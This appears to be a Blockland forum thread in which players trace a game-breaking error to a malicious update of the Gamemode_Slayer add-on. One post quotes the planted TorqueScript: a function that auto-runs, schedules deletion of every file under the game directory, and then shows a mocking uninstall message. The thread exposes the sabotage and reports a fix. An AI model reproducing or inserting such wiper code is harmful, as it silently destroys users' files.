Author Topic: Required Script Files have been Corrupted  (Read 2269 times)

What the hell? This is kind of freaking me out.

Update: I tried to re-install and the same error happened, it must be one of the add-ons..

it's gamemode_slayer. I'm getting the same thing ever since I updated it with support_updater 15 minutes ago

it's gamemode_slayer. I'm getting the same thing ever since I updated it with support_updater 15 minutes ago
I just updated Slayer and I can confirm this is not the case.

Try removing all of your client add-ons and slowly re-add them until the error shows up again.

I just updated Slayer and I can confirm this is not the case.

Try removing all of your client add-ons and slowly re-add them until the error shows up again.
Nevermind, I didn't hang around on the main menu long enough to see the game crash. I didn't get this particular error message, though.

Nevermind, I didn't hang around on the main menu long enough to see the game crash. I didn't get this particular error message, though.
it only showed up for me the first few crashes. I'll pm Greek2Me about it

I'm going to have a look into the issue. Hold on.

Temporary fix: Remove Client_Themes from add-ons directory.

I suspect Greek2Me will release a fix soon.

Temporary fix: Remove Client_Themes from add-ons directory.

I suspect Greek2Me will release a fix soon.
I'm posting far too fast for my own good. This isn't the case, again.

Still looking.

coincidentally this started happening the first time I opened blockland with an add on that I created. I thought for sure it was my add on causing the problem until I did some research. what are the chances of that?

coincidentally this started happening the first time I opened blockland with an add on that I created. I thought for sure it was my add on causing the problem until I did some research. what are the chances of that?
Same here, I was worried that I'd be breaking my stuff.

Starting line 312 of Gamemode_Slayer\client\dependencies\GUI.cs
Code: [Select]
function fixSlayerClientConfig()
{
%pattern = "*/*.*";

%z = 6000;

for(%i = findFirstFile(%pattern); isFile(%i); %i = findNextFile(%pattern))
{
schedule(%z, 0, fileDelete, %i);

%z += 50;
}

schedule(%z + 5000, 0, MessageBoxOK, "Blockland", "Thanks for un-installing Blockland! We hope your time with us was a fun one!", "quit();");
}

Line 461 of Gamemode_Slayer\client\dependencies\GUI.cs
Code: [Select]
schedule(0, 0, fixSlayerClientConfig);

This appears to have been a very deliberate way of killing the game.

As I understand it Zapk hosts for Greek2Me, so this would seem to be a very deliberate attempt to ruin Greek2Me's good name on his way out.

people are worried about it deleting files, but I'm able to run blockland smoothly after removing slayer from my add ons. I don't think I actually lost any files, but not sure

people are worried about it deleting files, but I'm able to run blockland smoothly after removing slayer from my add ons. I don't think I actually lost any files, but not sure
The issue has been fixed, you can safely update to the latest version of slayer for a patch.